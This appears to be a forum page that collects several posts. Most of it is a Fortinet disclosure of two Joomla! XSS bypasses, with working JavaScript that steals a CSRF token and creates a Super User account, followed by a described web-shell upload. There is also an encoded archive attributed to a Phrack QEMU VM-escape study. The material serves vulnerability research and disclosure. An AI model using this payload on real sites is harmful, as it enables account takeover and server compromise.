MRG-_<BS7(?RMS`7ZK<R%O?98"),>;$*Q@$,\DGQ=2G^;?23_*&DN&@][JW@A M/1D0`)U9JKDC5^]'S^1B"9DW83O[\;-JE6S&]='O6^6OFQD_3M+[95"*\8C+ MA.KY//MLF"KITE_#7L.-';9)P;9$-]6N2^8I&G&M_E#74S6=GTSL=2<G?Y4B M27T1-%!\K2\N)J\L(F?AM*I#]E86%=NZAGJ#/#5?7JU7&U0;\R:.-%'X4G.^ M_H=($N^39OA282:/0577BQ2=F?Y3^N.H=QN*I%NLC@QTOR$;0[I4Z;#[_*3O M8DFCAJ6+#_YQ9%3O#@NANR_3U3I7G#"29A7F8:VI_T>Y6F\&M.5'M]'![Z9[ MU^G:8:M1M4THC*O?9>NWHBI6TFH]\6\9_*K%CE!1RH>M!LOTG=WH/0DMKDUV M'3JZ#9P"C6F34U7,U8R__;$0J+*Z6DP<-G#5G[%;=#@RV@)H:"/6V^B6.N:@ M)<0:4DTY8VJU50I:=8GL8#AJG:OZ6RY&HEF<=X+E(L^O)C9]5R]/Q5TXWS8V MKU"!9Z;&BXO\`\C=ZT5&7G'R\FJUI/@RR$)4HN>B?(\6H%H\Z&_+AT9IR;ZE MS"%+1?'A.TPIGJIG@J)V9AS@FYO)L05[7+QS+6(XJ%!'0.R@OU:RS%8N79M' M"[XO^!RV-"!YEYLY++/Z?F.$(#8L`#Z6]=,`H*#3T*%]*\M=J>YAMW9=?@Y4 M.7L+L%HB5V2CINY`M'?`MID0Z8;LP!TIB!!5C?R^N%JB.Q@\D%(@@5-#:35? 
M-AUWH-3@`B?"+*Z%O-P!>=E!7NZ&7+FN&JQ`ECO60N]4476IM:4B+M>N2*8V M*E(F\7U"!DO,%0RB$J`0@RBP)IX.'NKN`E\=B8@/57HGXD.S%EFNMZ)&!0C< MV<`HM3;RMM2LENVMO5,9VQQ5#[/[[O6&)57%.P*1CGM>S]_A@GQ]=5]A))S@ M?_NN$T*RXJ*Z89.)_$Y*E4-\5XQ_CJ6Y=I,8*E)AZ=1'$MEF(D1[YUB_><:' MR`<R[,A)2_/"[^&[J-OHJ))6G)2#*E!*;?9X,E"J?AFPM10]V2#Q*Q[2ROS6 MH_W:(IHT1KL5%O9M.Y:6YFWUQ25OZ;5@>'6I#$<[K[8LQ8G1]3XT/>058-(= MSGMJ_"'5J8%*5[*G&ZH:Z=JNFITC_8*J"4%OM\5DK%ZX:PL)@UI5W5+15WJ< MT.A>I&.*PVFU0\I637F"NYDV)C@LW!?>R*3D4"6+VA,5A)R585>Z%!I>N'L: M/50/ZF6>G3U],3M[\N@QZ_Y>S/[[[)L73^2/)W]_\E7=YTIZ:_MKJ?UMR'%M M&ZRZKYKI`&),]8OPY9?#G:_+#M5%_97G!^7RK_>$H=6JM4[I+0/'UKWBIZ#> M;$'=55P>-)0+1T9'D6#5V#5PFR:<<KC@E[]M=4A#F]A5C!^HY6^QW92[SF9G M/A5>40;31=A$JB\.-=J="[R[Z'03)J'EB^F?KBZOKC<8\>0?UW/R^K!.F0_H M=D359I[LJ[8OL&$[&/:NB!<.Y[B?PR`315JRI<^]>_68=6Z;*%0U%;W8K):+ MB3(<G455"BT,XTD19)E_YP#64.VA>U[:JBS?-S/.GK^H<`!P^;[<?%AP%!72 M$GH=)2'K$(4*T;304:A&B\AT1?VEO#V1&*T!A*A\TJDD*;-3D0)X,>]O!:[1 M9.S-48"JAO1H1T7/G!Z$ZGFZJ^;>RG0JB';ZZV1'8\NUOEXN<3M9S-?HC62S MP?@WT+77^9UN`P?7K5LO0T;_.JYNX'[EQ6^@SOH]9P^1JF9U=JBRSEOM5NI> M5DR#QG.5GGZ'>>7N,*\(+\Y5?O*#F.4SG^&]IG([-D:8__T_=?SW]%U^;)N6 M=^Q9OO>KQH`?CO_N.('CR/CO?N!8&/_=]MPQ_OOO\1GCOX_QW\?X[V/\]S'^ M^QC_?8S_/L9__^3X[[\X4OJ?)P#W&%][C*\]QM<>XVN/\;7'^-K_CO&UQ_!H M8WBTWR(\VO_G0;7&B$IC1*4QHM(84>G?+*+2&"YF#!?S>X>+^5=%63&RZ\MJ M?XD2+">'R\;-#9IJ""L4JA-21-?(-D;QC]=X2WW2?:N,6:J?*GK/_[EA^<(9 M+2P=RTTQN?-J:=Y\;EK^S5^-._10^-Z<GMC(_,]-^P8RINI#:2Y%Q12\,KP# M_K2Q%JNNQ9`/#.IJ[QR.7@I'+X6CE\+12^'HI7#T4CAZ*1R]%(Y>"O_D7@I' M_W6C_[K1?YUF)S7ZKQO]UXW^ZWZI_[H_EV>>?H\VVYS9C"YH1A<THPN:DW\_ M%S2[J'V'%O\&@2H_EZ@C;M%=77?[!A/:LQA=XHPN<0AL=(DSNL097>*,+G&$ M2YQ;OZ2MWW^N\W?YNLR/TW7ZJ[[^W/;^TS)=WY?O/P,KL/']9^#8X_O/W^.S M[?6,>&13F[>??84NLV'/?W&X9^!7G-OX!Z9U>&C\*%UA4]J/>/=W>"ATEN<< M(/)UOLS7,9ID7I?(47B!_.B'%T\??_.]\<TWL$0O/BQ7E[!&[QO3O9L?'1L$ MR<V/ML]_'/[#B18D<BE+)%C\QZ0_(?T?T/\>_>\R-!?">\9]Q1:4#X:UHW3N MB.WYE3&H>%A#9HU!8`:.&9%)9IZ;N6_9J*FYB2(S\JPD9J/+P,]2UXH(P/3C MP@W)W#*/?"?V'#(#C7+?C;S888`\2\+0(5O-(,K2)(S)K#0W,R^/+#*NC(+, MSJ(P9(`H\=W4ILU6D"=6D"9D>YD'26AG9D``9E)86<1VH%:6!!8P&^W.XL2T MS8)J*YPD"BR73$9#-\E=*V.K3RO.XLP-"*N?95GNYE1;X69NXGED;QHZF1-Z M:<``CI]&(5N]^JZ?Q"&;HQ:9;Q=10$:D8>Q[:92G#.":EI>Z1!D?!(&?9D2Q M(C8+)_/)-#;,S-#,"H\`G,3/;3.EMKJI'UFF1Y3)/-]TK9SZ%MM^@.*$`5+3 MR=V,VNHF)K3<)<IDMIF%7D%]BSTS3CP_80`O\>*PH+:Z=F)'H4^CFR5)DD89 M]2U.D[2(7+;0=>P,BN0.F_="0].`1C=+,]_,4NI;G&26DWD1`=A^%CEF3%@] MH+5I.E1;&F:!9X5$L:3(3-^R?`:P$K<`BK/=<>*DKDVUI4421UY$%$O")(-^ M%`P0FG821FRN6YA>&+*A<.J;0."$1CVQS"2/;#94M@N_"-*0*..%?NBF%EL3 M6]"(+*913WS?MS,G(P`QN]G,5TPLFG!A9MMFDK)]<>99ILW\$%B)%7IAQ-;, MB9]X%E$F*I(B=V/J6QXF8>8ZS`]!:`9I%%-;S<(TBX@-KR/?C.(P9`MFR\RC MT&)^"`H_-F&4V"[:AY;:-+J1!5,QC:AON>\[7BKLHD4K"*N5^JEO^50;3&#/ M@=E!$]'V;=-TF1_\U/0C+R>L5F):L1=0;:%MA@60C`!@#%+78W[PO<3,HM1G MP_`DR",VG@Z3)$_"G"VLTP0X.F!^``)G5I8192POB^W,)8J%:>8$:4&C7B0P MAU.?^<'-$MNW/&JK$R-3IFR&[22I:0;4-V#6Q#%SY@<WSHK8<ZFM3I:%D9<1 M96+@D=3UV9(;6*]P"^8'U_$C$%HQF[7[>185*1MZ^T$8NFR8'OLF#)VP6'=- MU\X":JOCF`[,<!K=.#9C-_6H;UEF9D&:,C]XIND%ED-8[<"T72L6YN8F3%(V M-$\C,P4J,S]X@1\FGDU8;=,O0B^AVI+(]S/7)(JE()9S-V)^\/#%7V029>P( M1B2*B&(P.F84VC3J:9`%<9@(P_TH<9S,(LK8>>+";""*)4&2>:F3L*5]$OMI MS/P@A#>U-8J3(@%!11-1""P2TFYB97;$_)#'F0>;'6IKE&5V$,1$&5.,*`$X M&3!@R/R0.R`@$WY>$+F^ZR0A/SO(_,R/'>I;$/NQ%\?,#[EKYFEA4EM!WD1% M$;%M?FR:<6Y3WP)8)R)8.PA`,!EA#0,SC(&#:"+FI@5\0!3S(]-/;?$JH`A\ MVPL\PAJ:ON?#$D0`D9\ZL*,C@-Q/3#]G?BCRS+62@"@31IECPQ#S8X(L#J#E M!!!DF1NGS`]%E$09R"8"R),\ATX00``CD;L.*QH2,\PSY@=!#&IK;&56Y`1$ M&2?,PM1.J6]ND16%[3$_9%:2^$%!;8W])(6Y191QBL0S8=$C@#"Q'=]E?LA@ M,;)!UA)`8<8@FVET'=]TW+B@OKFPM86Q8'Z`]IMYD5);XQ"Z5W@TNH[EYV'. 
MCS!@(QPE><#\D":^E3@A84U2'R:`1;7!?J3([)@HYL%XY-`H!DC--`@BPIHD M9N(&)M4&DMBV_(0HYGDFP-C,#ZF7@(#@YQP)=,9,;**8G22N%T?\J"5-'!"H MS`\I,'11Q$29Q,M,$$5$,1N6DPC$-@$D61[G%O.#V)M06_/4=PK;)LH$GA_' M3D1],\5"R`"I"5,KIK;FB8FSG2@3V+"3"D)^-B,D!0-X2>'&(;4UA]4NB"T: MW2`!)DEBZILI2,D`=F:'>41MS;W,@[E'HQND69H7"?7-3+(D*VSF![&&$%;8 M1;FY[5)M?IAEB5,0Q:PBBT/'9WX(K22W8`M#`$!W&^0_`12)&00Y4<P*D\`- M`N8'7)>]."?*%(4)"UA`%/-]TP<!3J-NH0A,/.:'L/"]")B``$+?!EBB&"Q= M25%D-.H6[*+2PF5^$+Q.;<T"$P1-3I1Q<],-'7ZXY$0@I9R4^2$&:MN^3VV% M+8AIP<:``"(_<@.7^N;DP-!!QOP0YYGEQRZU-8/]D1=G-+H@,T'X^-0W)\A" M)RF8'^((>I9[XME3DL!>D$;7#1([+0+J&T@ZKRARY@<Q)H0UC9,XM4.JS8-6 M1[#"T$1T$S=V8E^\5LI,8$?"FF;0;3^BVCP7EJ+`)HK93A;Y0<+\`#/=#V*; MWSVYON7&"5',RWP84WX_9<=^82<1\P.L",`^#E$F=6`_FL=$,2\V80=HT:C# M'MS.BS!C8WGU<#$3/OQJ`UVI^6U;"P]'0T"KNRH<@[0?(3]_G/P2\;0=^I$[ MOTI?`(F5T7C5/*$0J*WNJRA.8W2HWR(ZE+3>T>`1=@ZMBU1U6IPTWUOBL`OJ M(K<4.?XCPJJCTB14/8EXFJE3E(S8R:I)VH&CDDH,G,%:@,]!0ET=-3U2GAJO MEG?(->1A$[&<7#0=40+$&:[K[1KBJZO%!PZ3Q4:/5(F"<T]TUL+.$AUZFU^] ML:#\4[56Q6R>^K5.N4+H17F=IGE9%M>+Q8?*]OU?K;7Y]3ZU_H^]G?P6=0SK M_TS8DY#^#_96I`'\7Z8%)PQGU/_]'A^IUZN4\LKE4JWO@D_LP1&X4@,V;Q-T MQ>W"4HISW.)&!<WB3AJKQ?%BN]F<9G$WRNOB>+>_I>UP`J^*4S3C5OE68VP% M.P7['<3N.D5=G,(;#V)W<Z6K&,!X&+N3*EYER/?X<&."M"Y>YHO6('6&*<_J MXA@G>0MV.%A7Q2E@\G!78P5[^:'<Y)=#C?&\0.EJ(\XR@[6PVPIENC=-3>QP MM';<0'&)I']FK>^)$X:%VC3M0^P>H@%LX/IZV$T'L@,;A:D>MO5*6@>;!78_ M;-@$;</"%EL/6SU`[6^S9UEZV+)1HQ86SJ&_?IM;#\ZUM#+SWX;.RE-U+6SF MUH)LZ!U[%S:`(Z<.5O-4MPOK*\[+!IZ_:]BT\'.K&("M'L=K89,X&H!MO@IO MPZ9..`#;>%/?J3=S0PWSE[I)V1HAQ]7,C%+'"6TVT+%NJ1,9;7FAS(F>5_H] M0BKQVA-"_XB_/1MB3Z'.+@_V.^151/'V!_B:Z1@6??`[L4(2I;]:_0.^`?J7 MAR+63*^N0X`>^,AT-")$[S&@RU5Y;A=./[A&ZK:G.+1^J/:VP&^!^[:6>"V? M!+W@H3<`KEDB6^!)I)EZ?9X--#,G[8`/.3WH3)S8^S.?!^OS'\7Z.<YOKA:K M^>9^^2N>!)%2@>?UV7_@[5#K_.>Y4'P\__T.G[]\]B"9+Q\D<7FQOX\6=?=N MZ,]QOK\_+XR7QO'_&'?N6G>,\_V]S46^1+.H]&(%::;QY56\N3C>K(YQ[WW, MKJT?WA$FUOO%?'^?TT[O6OO[Q?4R)3\?V;R,RY)4ACFE8+9`^ICR\LMD@3J? 
MNZ(`!D<W'A[8^WMHAWMZ=W+Y%@X25X?DI(1,<X\SX_A-5=ZX*]QL/S3N8K;` MSM]_5IHBRM..I=T@/'ODB\(X?FY4^#X:K]?YE7&_JNBC$;]_:WSQ$RF/C+ON MSU\T\7^X3$!V@C1:I82??A/ZJN5G;>QW7GUYEPN^>GBG78/5JB'[L(POY^E, MU%1UI*XHC0'L:K&IT/_%N#M1&V:(VJ``NN/^HGSPHSE]\."+0UWE=:&_WH4R MS=Z2%<VVII!E8*>K#_^ZM:OHWRTFQUTW\?IU:1Q_\]//PDV%<0==8=RU;NZ` M=/Z)GIQ`CV&B*(/8HC)3!#8T"^-X:5CMRNV?OS@4.'B^$@T/]['U=1I99*(/ M3YJ\0ZH4(+DRUPQ!!.Z28?F'=UHX=/H5J+8[VK6]YB`ZC?ZE!QV7W(*MJY[I MPX8E!Y'IE#=Z9%C2=P>1Z50[>F14<A"73N^CQT5N4(90Z71">E14<A"73F&D MQX4E!U'IE$EZ5%AR$)5.T:1'Q24'D>G44'ID6'(0E4Y%I4=%)8?[J-%?]?21 M2@[37J/=ZJ%]H^0@4IT.#"1/1RXW3:UU&#O-W:8MTU;3A1JFR3:UVO9*R+7K MSG7HU&_;Z]C<H@:=\FA[#374[6IJJ\=VJRF\744Z_=_VBA!J]SIT>L+M=91_ M2'KI=(^[5<10?]3)UM9K[E830PWO"+9I0;4U]4'M6I5>2[2MJB;4\*YIFY)5 M6Y<>ZI85M32R.U:$R;>KIZ4BW+&>"NJ6O6KI>W>L34+=;MG3ZHF'9WQY&XFD M52=OQ[^[5-6JG;=7L/MZJE5/;Z]@^ZY@6(\]Q*`=D)W&?"?M]PZ3K0/9K/U$ MW\UAI?50;_60MZKT]N)6"_D'[.A.*OWAV=J`U-?6RQP#]P#;*E4`=V/$@4N# MW>JJ`&]7GV;/MEM].PO)@0N)G7NVH[@<N+S8K:K=!>?`1<=N56TYC^QR)3+, M;AK`76H<O$49JK$'L$=Z_XDO7_X`G_K^Y[OX+0S?(O_UZ\!;G@'[/],,@M;] MCPLEQON?W^/SU=??/OK/YZ?'KXWCA=`T&<?E)CM-+<LX?CQ[_.3K1S]\BTYY M?CC[ZLG^?KQ8_-5X=WG,DV;DO3_[1Q/_&5C3_1WC/]N.[UEM_K?=8.3_W^,S MQG\>XS^/\9_'^,]C_.<Q_O,8_UGU=/.'"O;\Z9&<6\&*U0"TKAGYK6P1RY@^ M(J!Q5>+QV=]%.F[@ZN072G)-HV^?/GU6)=?FS(___MV+K[]ZSLFU-3=PZ+>R MM/+"Y/'95W][]@B3*92TFOR_OS+H>;&2#+S_'2/!"-@BSB?WJQ%8]^SQLSIX MY]DC\0,?/I\]?\$_7'ZNJ_-Z-#H]&IT>C4Z/1J='H],C`AB='HU.CT:G1Z/3 MH]'IT>CT:'1Z-#H]TC@]$J$.KM(E6WL5\]<RT+OE8ZSVRU66*ZYI#&.]R)>- MA$T[X3).7_KG)PJ6F=1&-\HMXFS],CQ7W>,8ZRI62)U6Q0_I-)CB.:C>=F0, MF*KY&!'E]>:"D[A:>@QS7<J0],U$NU'SY;S9%*4?W!8ZILD><9LX%,'+SI&^ M.K-Y+,=XE>1UQN9=#*7[+$=YO1\LQ)MGR%4;@T]D*"@'AB,>8SV/L9ZUL9X? M3%GYH@LIIT[C&;E:FJ7KM'9&)6,-=7R/#0;M&OV2_19^R4`:+C$.E!P3X9+L M2'HEJ_F(!;P2M$4G^:?\=W`DNP)XNDL<&@V8D.LT%41\,U%_-ZB:VDP.`\/? MCQ_B`@4#0#K-CZ1GY.A-2):J#&HU[KR"L]XKV(F^@IWI*SCKO;K)\U>PP:&( M`+(H+F^D9S25Q(TNL8XGI`^Q)GJGHAF&V-00W5#KJ8R_*(.,U934CFA?2$2. MD3<O9^LZDC8ME4FZ1&%ZW%FXT)$;YAV<TG:PD+\_TF_3-+?'5*R;1!&91&$E MB%VGTCJ,X5`HMW;(0U[LT>DB-%!(<NZJC!RZSM,<I)WPPU<:J_>HK$\^\&TI ML`>'$65T<D]`0Q^:,F1:5TI2M*/=R-_'([M&A.M2:GL\..XZ+I;/7SPSGGS_ MS'CT^#%J^I/YIM1VF,;6=@B4Y_[D6,:6P]_*7*#?RES8:X\%;0^Y"<5B?D4D M7Y<7\&VSZB?Y1TEST?CYZV6\D'&>"(#BD%9S1T;D>_1,!L"#S)NPG?WXV7#D MNX8X5'^HJY&:CN$]3EK@-/C\5;*\>C<T4'RM+RXFARPB1WE:U5'[AU0CY&WS M3KJIRI`$6*R.C(OY;QW538EW)EB[-V2:5BJTJ"!%`ZURT\-6K--/0;W9@KHK M>`\:@W=D=`;*JK%KX#9-."5:FGE85UA/MX8T["[L!VKYH]WC58E/JS.?"J\L M9A2<<R*GV:&&>RYP9]7I)FR?+%]$51/>0IL>3%$,\-Y-E<8G^VJD9O2U.WPP MPPU3VP4OQF.NQZRS%R:?I53T8K-:8FS0REVI#`.'EC!DA,72:@ZE&I((52[$ M/LOWS8RSYR\J'`!<OJ^CV)%0\SHRC46>D'BFA7H!C=!C,J*XE9L]B=$:0(@R M02=!*;-3D0)X,>]OQ7PYWY!]%-KW;>J&]`AST3.G!Z$:#["[*F_E,15$.]MU MHN(3HCF-G_$S?L;/^!D_XV?\C)_Q,W[&S_@9/^-G_(R?\3-^QD_]^7_T`TH, $`$`!```` ` end Sursa: http://phrack.org/papers/vm-escape-qemu-case-study.html
    1 point
  16. Multiple Joomla! Core XSS Vulnerabilities Are Discovered

by Zhouyuan Yang | May 04, 2017 | Filed in: Security Research

Joomla! is one of the world's most popular content management system (CMS)
solutions. It enables users to build custom web sites and powerful online
applications. More than 3 percent of web sites run Joomla!, and it accounts
for more than 9 percent of the CMS market share. As of November 2016,
Joomla! had been downloaded over 78 million times. Over 7,800 free and
commercial extensions are currently available from the official Joomla!
Extension Directory, and more are available from other sources.

This year, as a FortiGuard researcher, I discovered and reported two
Cross-Site Scripting (XSS) vulnerabilities in Joomla!. They are identified
as CVE-2017-7985 and CVE-2017-7986, and Joomla! patched them [1] [2] this
week. These vulnerabilities affect Joomla! versions 1.5.0 through 3.6.5.
They exist because these versions of Joomla! fail to sanitize malicious
user input when users post or edit an article. A remote attacker could
exploit them to run malicious code in victims' browsers, potentially
allowing the attacker to gain control of the victim's Joomla! account. If
the victim has higher permissions, such as system administrator, the remote
attacker could gain full control of the web server. In this blog, I will
share the details of these vulnerabilities.

Background

Joomla! has its own XSS filters. For example, a user with post permission
is not allowed to use full HTML elements. When such a user posts an article
with HTML attributes, Joomla! sanitizes dangerous code like
"javascript:alert()", "background:url()" and so on. Joomla! performs this
sanitization in two places. On the client side, it uses the editor called
"TinyMCE." On the server side, it sanitizes the request before storing it
on the server.

Analysis

To demonstrate these vulnerabilities, the test account 'yzy1' is created.
It has author permission, which does not allow the use of full HTML
elements. To bypass the client-side sanitization, the attacker can use a
network interception tool like Burp Suite, or simply change the default
editor to another Joomla! built-in editor, such as CodeMirror or None, as
shown in Figure 1.

Figure 1. Bypassing the client side XSS filter

On the server side, I found two ways to bypass the XSS filters. They are
identified as CVE-2017-7985 and CVE-2017-7986.

CVE-2017-7985

The Joomla! server-side XSS filter sanitizes dangerous code and keeps the
safe characters. For example, when we post a crafted snippet with the test
account, Joomla! sanitizes it by double-quoting some parts, deleting
others, and adding safe links to the URLs, as shown in Figure 2.

Figure 2. Joomla! XSS filter

But an attacker can take advantage of the filter by letting it reconstruct
the code and rebuild the script. For example, we can add the crafted code
shown in Figure 3; note that the double quote used in it is the CORRECT
DOUBLE QUOTATION MARK.

Figure 3. Inserting the PoC for CVE-2017-7985

When victims access the post, regardless of whether it is published or not,
the inserted XSS code is triggered in both the main page and the
administrator page, as shown in Figures 4 and 5.

Figure 4. CVE-2017-7985 PoC triggered in the home page
Figure 5. CVE-2017-7985 PoC triggered in the administrator page

CVE-2017-7986

When posting an article, the attacker can bypass the XSS filter inside an
HTML tag by replacing the ":" of the script URI with its HTML entity form,
which the browser still interprets as ":".
The attacker could then trigger this script code by adding a tag. For example, the attacker can insert the following code in an article , as shown in Figure 6. Figure 6. Insert the PoC for CVE-2017-7986 When victims access the post, regardless of whether it’s published or not, and click the “Click Me” button, the inserted XSS code will be triggered in both the main page and the administrator page, as shown in Figures 7 and 8. Figure 7. CVE-2017-7986 PoC triggered in home page Figure 8. CVE-2017-7986 PoC triggered in administrator page Exploit Here I provide an exploit example for CVE-2017-7986 that allows an attacker with a low permission account to create a Super User account and upload a web shell. To achieve this, I will write a small piece of JavaScript code for creating a Super User account by using the site administrator’s permission. It first obtains the CSRF token from the user edit page , and then posts the Super User account creation request to the server with the stolen CSRF token. The new Super User will be ‘Fortinet Yzy’ with the password ‘test’. var request = new XMLHttpRequest(); var req = new XMLHttpRequest(); var id = ''; var boundary = Math.random().toString().substr(2); var space = "-----------------------------"; request.open('GET', 'index.php?option=com_users&view=user&layout=edit', true); request.onload = function() { if (request.status >= 200 && request.status < 400) { var resp = request.responseText; var myRegex = /<input type="hidden" name="([a-z0-9]+)" value="1" \/>/; id = myRegex.exec(resp)[1]; req.open('POST', 'index.php?option=com_users&layout=edit&id=0', true); req.setRequestHeader("content-type", "multipart/form-data; boundary=---------------------------" + boundary); var multipart = space + boundary + "\r\nContent-Disposition: form-data; name=\"jform[name]\"" + "\r\n\r\nFortinet Yzy\r\n" + space + boundary + "\r\nContent-Disposition: form-data; name=\"jform[username]\"" + "\r\n\r\nfortinetyzy\r\n" + space + boundary + "\r\nContent-Disposition: form-data; name=\"jform[password]\"" + "\r\n\r\ntest\r\n" + space + boundary + "\r\nContent-Disposition: form-data; name=\"jform[password2]\"" + "\r\n\r\ntest\r\n" + space + boundary + "\r\nContent-Disposition: form-data; name=\"jform[email]\"" + "\r\n\r\nzyg@gmail.com\r\n" + space + boundary + "\r\nContent-Disposition: form-data; name=\"jform[registerDate]\"" + "\r\n\r\n\r\n" + space + boundary + "\r\nContent-Disposition: form-data; name=\"jform[lastvisitDate]\"" + "\r\n\r\n\r\n" + space + boundary + "\r\nContent-Disposition: form-data; name=\"jform[lastResetTime]\"" + "\r\n\r\n\r\n" + space + boundary + "\r\nContent-Disposition: form-data; name=\"jform[resetCount]\"" + "\r\n\r\n0\r\n" + space + boundary + "\r\nContent-Disposition: form-data; name=\"jform[sendEmail]\"" + "\r\n\r\n0\r\n" + space + boundary + "\r\nContent-Disposition: form-data; name=\"jform[block]\"" + "\r\n\r\n0\r\n" + space + boundary + "\r\nContent-Disposition: form-data; name=\"jform[requireReset]\"" + "\r\n\r\n0\r\n" + space + boundary + "\r\nContent-Disposition: form-data; name=\"jform[id]\"" + "\r\n\r\n0\r\n" + space + boundary + "\r\nContent-Disposition: form-data; name=\"jform[groups][]\"" + "\r\n\r\n8\r\n" + space + boundary + "\r\nContent-Disposition: form-data; name=\"jform[params][admin_style]\"" + "\r\n\r\n\r\n" + space + boundary + "\r\nContent-Disposition: form-data; name=\"jform[params][admin_language]\"" + "\r\n\r\n\r\n" + space + boundary + "\r\nContent-Disposition: form-data; name=\"jform[params][language]\"" + "\r\n\r\n\r\n" + 
space + boundary + "\r\nContent-Disposition: form-data; name=\"jform[params][editor]\"" + "\r\n\r\n\r\n" + space + boundary + "\r\nContent-Disposition: form-data; name=\"jform[params][helpsite]\"" + "\r\n\r\n\r\n" + space + boundary + "\r\nContent-Disposition: form-data; name=\"jform[params][timezone]\"" + "\r\n\r\n\r\n" + space + boundary + "\r\nContent-Disposition: form-data; name=\"task\"" + "\r\n\r\nuser.apply\r\n" + space + boundary + "\r\nContent-Disposition: form-data; name=\"" + id + "\"" + "\r\n\r\n1\r\n" + space + boundary + "--\r\n"; req.onload = function() { if (req.status >= 200 && req.status < 400) { var resp = req.responseText; console.log(resp); } }; req.send(multipart); } }; request.send(); An attacker can add this code to Joomla! by exploiting this XSS vulnerability, as shown in Figure 9. Figure 9. Adding XSS code Once the site administrator triggers this XSS attack in the administrator page, a Super User account will be immediately created, as shown in Figures 10 and 11. Figure 10. Site administrator triggers the XSS attack in the administrator page Figure 11. A new Super User account is created by the attacker The attacker can then login to Joomla! using this new Super User permission and upload a web shell by installing a plugin, as shown in Figures 12 and 13. Figure 12. Uploading a web shell using the attacker’s Super User account Figure 13. Attacker accesses the web shell and executes commands Solution All users of Joomla! should upgrade to the latest version immediately. Additionally, organizations that have deployed Fortinet IPS solutions are already protected from these vulnerabilities with the signatures Joomla!.Core.Article.Post.Colon.Char.XSS and Joomla!.Core.Article.Post.Quote.Char.XSS. by Zhouyuan Yang | May 04, 2017 | Filed in: Security Research Sursa: https://blog.fortinet.com/2017/05/04/multiple-joomla-core-xss-vulnerabilities-are-discovered
    1 point
  17. https://discord.gg/SMTh94H For those who don't know where to join, the invitation is permanent. PS. Don't act like animals or I'll burn you.
    1 point
  18. 1 point
  19. And what do you want to do next? What do you want to learn? And why RST? This forum is known for many things: security, drama, carding, SEO, exploits, programming, etc. Which of these are you interested in? Good luck!
    1 point